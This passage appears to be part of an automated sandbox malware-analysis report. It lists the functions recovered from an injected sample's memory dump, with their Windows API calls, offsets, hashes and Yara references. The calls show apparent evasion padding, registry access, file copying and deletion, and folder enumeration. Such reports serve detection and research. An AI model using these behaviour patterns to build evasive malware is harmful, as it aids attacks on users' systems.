                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F139
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F140
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,74DF2F20), ref: 0040F14B
                                                                • LocalFree.KERNEL32(00000000,?), ref: 0040CE4E
                                                                • LocalFree.KERNEL32(00000000), ref: 0040CE55
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$Create$FreeTimerWaitable$Event$AllocCancelDebugEnvironmentErrorLastMutexOutputStringVariablelstrlen$ChangeCloseFileFindMappingNotificationQueryReleaseResetValuewsprintf
                                                                • String ID:
                                                                • API String ID: 3070269340-0
                                                                • Opcode ID: a99689bf45864b5ec1906f66ebe6542963ab50e06dc9e997953053ed04098da5
                                                                • Instruction ID: 4dfc7a642496ed24b93a575f4bc6a8169dd78f7e3a9106d702aff18ed4a6e6be
                                                                • Opcode Fuzzy Hash: a99689bf45864b5ec1906f66ebe6542963ab50e06dc9e997953053ed04098da5
                                                                • Instruction Fuzzy Hash: 49115B72200604FBD7109BE5EC89EEB7FB9FB8D750B108139F615E61A1DA749900DBE8
                                                                Function 004036B6 Relevance: 6.2, APIs: 4, Instructions: 200fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LocalFree.KERNEL32(?,?,?,?,00000000), ref: 00403920
                                                                  • Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
                                                                  • Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
                                                                  • Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
                                                                  • Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
                                                                  • Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
                                                                  • Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
                                                                  • Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
                                                                  • Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
                                                                  • Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
                                                                  • Part of subcall function 0040F788: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
                                                                  • Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6
                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 004037BD
                                                                • DeleteFileW.KERNEL32(?), ref: 00403900
                                                                • LocalFree.KERNEL32(?,?,?,?,00000000), ref: 00403917
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$LocalTimerWaitable$EventFileFree$CancelDebugEnvironmentErrorLastMutexOpenOutputReleaseSemaphoreStringVariable$AllocCloseCopyDeleteHandleMappingReset
                                                                • String ID:
                                                                • API String ID: 2810021360-0
                                                                • Opcode ID: 77a0497d223d91dbfa9f39cbaa40dfa713ff658a28409e16f692be07ec63b5c9
                                                                • Instruction ID: d9fac0fccad43b6753a2e64e6185f75ffbd148435cd6ec64393c45bbb094c01f
                                                                • Opcode Fuzzy Hash: 77a0497d223d91dbfa9f39cbaa40dfa713ff658a28409e16f692be07ec63b5c9
                                                                • Instruction Fuzzy Hash: 66716B71A00A10FFCB019FA4EC44ADD7FBAFB89311B108176F915E72A0DB759A009F98
                                                                Function 00404A1F Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LocalFree.KERNEL32(?), ref: 00404AA0
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00404ACD
                                                                • LocalFree.KERNEL32(?), ref: 00404B37
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$Free$Alloc
                                                                • String ID: kllprcss_
                                                                • API String ID: 3098330729-4223651432
                                                                • Opcode ID: fa9c6105b1b933d05a2c1453b4ff71aebacd487c3e4f17b59cda5cd16c1f795d
                                                                • Instruction ID: ff817052db59b86f66376c57117c1d7670d43ab72fb360e44b2dc31570c87fba
                                                                • Opcode Fuzzy Hash: fa9c6105b1b933d05a2c1453b4ff71aebacd487c3e4f17b59cda5cd16c1f795d
                                                                • Instruction Fuzzy Hash: 4631C572A00601EBD710DBA9DC81FEE7BB5EBC8350B554579EA05B32D0DB38AD018A98
                                                                Function 00404994 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001C,00000000,?,0040ABEA,?), ref: 004049C8
                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,0040ABEA,?), ref: 004049D5
                                                                  • Part of subcall function 0040194A: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 004019A0
                                                                  • Part of subcall function 004017B3: FindFirstFileW.KERNEL32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040180B
                                                                • LocalFree.KERNEL32(?), ref: 00404A06
                                                                • LocalFree.KERNEL32(00000000), ref: 00404A11
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileFindFirstFolderFreeLocalPathSpecial
                                                                • String ID:
                                                                • API String ID: 1746351402-0
                                                                • Opcode ID: 455925b83ff884e401dee865f49b1682429bd8eba2eb83eb4bf2c14b3daadbb7
                                                                • Instruction ID: 620316d3a31ac79b5e94170ac89b2bd3bad36cdb92a62f6f4bd3c57a6056ab34
                                                                • Opcode Fuzzy Hash: 455925b83ff884e401dee865f49b1682429bd8eba2eb83eb4bf2c14b3daadbb7
                                                                • Instruction Fuzzy Hash: A7012D71741304FBE7109BE5DC86FEF3A68EB89764F108065F609AB2D2C6B49D0086A8
                                                                Function 0040D0F5 Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GlobalMemoryStatusEx.KERNEL32(?,-00000014,74DF0460,?,?,?,?,?,?,?,?,?,?,0040D757,?,?), ref: 0040D10C
                                                                • wsprintfW.USER32 ref: 0040D13C
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040D757), ref: 0040D154
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeGlobalLocalMemoryStatuswsprintf
                                                                • String ID:
                                                                • API String ID: 2569036613-0
                                                                • Opcode ID: 0f70fd3062da3cac3b5f19807a63246b50f7002a35fae69366b377ef66014a30
                                                                • Instruction ID: b85e10f066533c2accdfb2ce5754b6930c2d3db72c5d780e6d819311f65ef2fd
                                                                • Opcode Fuzzy Hash: 0f70fd3062da3cac3b5f19807a63246b50f7002a35fae69366b377ef66014a30
                                                                • Instruction Fuzzy Hash: 0C01D671A00505EBD710DBA9EC05DDEBBB8EBC9754F108139F616E7291DA349901C7A8
                                                                Function 0040CF2E Relevance: 4.5, APIs: 3, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,0040D745,?,?,?,?), ref: 0040CF46
                                                                • wsprintfW.USER32 ref: 0040CF72
                                                                • LocalFree.KERNEL32(00000000,?,?,?), ref: 0040CF8A
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorFreeLastLocalwsprintf
                                                                • String ID:
                                                                • API String ID: 1841941599-0
                                                                • Opcode ID: acb68abfebbc4bec68edc886a45c336438e4e0c56bd2cae9b1bfa4e190a4fb0a
                                                                • Instruction ID: 2ea5e5cdb2dd98705f2870c41a4a65d4dcf796172a3407aa135bf1dfbf8b1fa8
                                                                • Opcode Fuzzy Hash: acb68abfebbc4bec68edc886a45c336438e4e0c56bd2cae9b1bfa4e190a4fb0a
                                                                • Instruction Fuzzy Hash: D3F0C232204611EFD7109BA9EC46FDBBBE9EBC8750F50803AF615D3290EA70980186DC
                                                                Function 0040D163 Relevance: 3.8, APIs: 3, Instructions: 81stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32 ref: 0040D1E3
                                                                • LocalFree.KERNEL32(?), ref: 0040D211
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F02F
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F034
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,74DF2F20), ref: 0040F04D
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,74DF2F20), ref: 0040F06C
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F073
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,74DF2F20), ref: 0040F07F
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F08D
                                                                  • Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F090
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0A5
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,74DF2F20), ref: 0040F0B6
                                                                  • Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,74DF2F20), ref: 0040F0C3
                                                                  • Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0CC
                                                                  • Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0D3
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,74DF2F20), ref: 0040F0E2
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,74DF2F20), ref: 0040F0FF
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,74DF2F20), ref: 0040F104
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,74DF2F20), ref: 0040F114
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F139
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F140
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,74DF2F20), ref: 0040F14B
                                                                • LocalFree.KERNEL32(00000000), ref: 0040D23A
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateLocal$TimerWaitable$EventFreelstrlen$AllocCancelDebugEnvironmentErrorLastMutexOutputStringVariable$ChangeCloseFileFindMappingNotificationReleaseReset
                                                                • String ID:
                                                                • API String ID: 3502303286-0
                                                                • Opcode ID: 986376585c1be7fddca9ec47d81cfdfd2a9ed6ad206b2c3e9d8bf18eb87f2514
                                                                • Instruction ID: 46aa998916bad886669833da217deba175eeebd613ba6d1a345f11969b470d48
                                                                • Opcode Fuzzy Hash: 986376585c1be7fddca9ec47d81cfdfd2a9ed6ad206b2c3e9d8bf18eb87f2514
                                                                • Instruction Fuzzy Hash: 8A21C171900604EFE714DBE5DC44EFE7BB8EBC8320F04C0B9E914A3260D6789E458BA4
                                                                Function 0040CECF Relevance: 3.0, APIs: 2, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • wsprintfW.USER32 ref: 0040CF0A
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F02F
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F034
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,74DF2F20), ref: 0040F04D
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,74DF2F20), ref: 0040F06C
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F073
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,74DF2F20), ref: 0040F07F
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F08D
                                                                  • Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F090
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0A5
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,74DF2F20), ref: 0040F0B6
                                                                  • Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,74DF2F20), ref: 0040F0C3
                                                                  • Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0CC
                                                                  • Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0D3
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,74DF2F20), ref: 0040F0E2
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,74DF2F20), ref: 0040F0FF
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,74DF2F20), ref: 0040F104
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,74DF2F20), ref: 0040F114
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F139
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F140
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,74DF2F20), ref: 0040F14B
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?), ref: 0040CF1E
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$LocalTimerWaitable$Event$AllocCancelDebugEnvironmentErrorFreeLastMutexOutputStringVariablelstrlen$ChangeCloseFileFindMappingNotificationReleaseResetwsprintf
                                                                • String ID:
                                                                • API String ID: 2222717693-0
                                                                • Opcode ID: 2f83e81dac036c5567b4000d25027c9feb5c42bbe6e1bf7c9335a7c1b0c23de4
                                                                • Instruction ID: 300ccac7d57f16db5c7777c1eba5f7d9e48638d208aa5d0326a913d2559a6743
                                                                • Opcode Fuzzy Hash: 2f83e81dac036c5567b4000d25027c9feb5c42bbe6e1bf7c9335a7c1b0c23de4
                                                                • Instruction Fuzzy Hash: 5FF01D72204204EFE3149BE9EC45FEA7B98FB8D750F408439E60993291D5706C0086A8
                                                                Function 0040C0BD Relevance: 2.6, APIs: 2, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c5143637d6284fc52e2c8644b17c9084598c2cade9509d866fcc6ded45347fda
                                                                • Instruction ID: 1541c4e0e89c87a5e0322f98375b82ab0aba876a011970956c66cf19a5a6e051
                                                                • Opcode Fuzzy Hash: c5143637d6284fc52e2c8644b17c9084598c2cade9509d866fcc6ded45347fda
                                                                • Instruction Fuzzy Hash: 2711EE36204614FFD7019F98DC80EEA3BA5EB843707108235F924DB2E1D7749D119BD8
                                                                Function 0040E2FE Relevance: 2.6, APIs: 2, Instructions: 64memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LocalAlloc.KERNEL32(00000040,00000000,?,00401BBD,?,?), ref: 0040E32D
                                                                • LocalFree.KERNELBASE(00000000,?,00401BBD,?,?), ref: 0040E37B
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$AllocFree
                                                                • String ID:
                                                                • API String ID: 2012307162-0
                                                                • Opcode ID: 06d02ccecb4cf407b99aee34e8dbeb925cb09c80e6a228b461bd11769ca6319f
                                                                • Instruction ID: e68ff254e9bf8303f4be3a74784e8a1710fe65e3cd1c47200051e706b3ae381e
                                                                • Opcode Fuzzy Hash: 06d02ccecb4cf407b99aee34e8dbeb925cb09c80e6a228b461bd11769ca6319f
                                                                • Instruction Fuzzy Hash: DB11C232600501EFE704DFA9DC90ABAB7E9EFCC700754843AE645D72A0EAB49C118764
                                                                Function 0040BC7D Relevance: 1.3, APIs: 1, Instructions: 19memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LocalAlloc.KERNEL32(00000040,0000FF78,00000000,0040A4B6), ref: 0040BC8C
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F02F
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F034
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,74DF2F20), ref: 0040F04D
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,74DF2F20), ref: 0040F06C
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F073
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,74DF2F20), ref: 0040F07F
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F08D
                                                                  • Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F090
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0A5
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,74DF2F20), ref: 0040F0B6
                                                                  • Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,74DF2F20), ref: 0040F0C3
                                                                  • Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0CC
                                                                  • Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0D3
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,74DF2F20), ref: 0040F0E2
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,74DF2F20), ref: 0040F0FF
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,74DF2F20), ref: 0040F104
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,74DF2F20), ref: 0040F114
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F139
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F140
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,74DF2F20), ref: 0040F14B
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F118
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F150
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000005D6,00000000,?,00000000,?,74DF2F20), ref: 0040F165
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F16C
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(tv49i65z7,?,00000000,?,74DF2F20), ref: 0040F177
                                                                  • Part of subcall function 0040F012: FindFirstFileA.KERNEL32(s_t4ckbkwe,?,?,00000000,?,74DF2F20), ref: 0040F185
                                                                  • Part of subcall function 0040F012: FindClose.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F18C
                                                                  • Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_qjkqlbwl), ref: 0040F1A1
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t9kx5wueg,?,00000000,?,74DF2F20), ref: 0040F1AA
                                                                  • Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,74DF2F20), ref: 0040F1B7
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(b4j4f6xx,jcezxitk,?,00000000,?,74DF2F20), ref: 0040F1C7
                                                                  • Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLamfolgz0), ref: 0040F1D8
                                                                  • Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,74DF2F20), ref: 0040F1E0
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t1v6z4di9,?,00000000,?,74DF2F20), ref: 0040F1E7
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXdxglk35i,?,00000000,?,74DF2F20), ref: 0040F1F0
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F1FB
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,00000461,?,00000000,?,74DF2F20), ref: 0040F223
                                                                  • Part of subcall function 0040F012: GlobalFree.KERNEL32(?), ref: 0040F22C
                                                                  • Part of subcall function 0040F012: RegOpenKeyExA.ADVAPI32(80000001,regwog66qaw,00000000,00020019,?,?,00000000,?,74DF2F20), ref: 0040F217
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$DebugLocalOutputString$AllocErrorFindLastMutexReleaseSemaphoreTimerWaitable$CloseEnvironmentEventFileVariable$CancelChangeFreeMappingNotificationlstrlen$FirstGlobalOpenReset
                                                                • String ID:
                                                                • API String ID: 161560346-0
                                                                • Opcode ID: 192db799459028f26035986bd8b5456fb1256e4cc981e0079fcd53e9d42c3365
                                                                • Instruction ID: 8810a4085a764086b3fc151d5a27c17ae9af842525b4396e58949895209dc749
                                                                • Opcode Fuzzy Hash: 192db799459028f26035986bd8b5456fb1256e4cc981e0079fcd53e9d42c3365
                                                                • Instruction Fuzzy Hash: 65E08634300110C7CA24FB70EC959ED639277C8300710C53A5541577C2CA79AC06679C

                                                                Non-executed Functions

                                                                Function 0040E83D Relevance: 121.0, APIs: 44, Strings: 25, Instructions: 267timememorysynchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_ym6bmffb), ref: 0040E85E
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040E871
                                                                • OutputDebugStringA.KERNEL32(tag0xnf48), ref: 0040E878
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLaxdt8ke2), ref: 0040E885
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040E890
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_jeyw99e1), ref: 0040E89F
                                                                • OutputDebugStringA.KERNEL32(tfo0sbavo), ref: 0040E8A8
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040E8AB
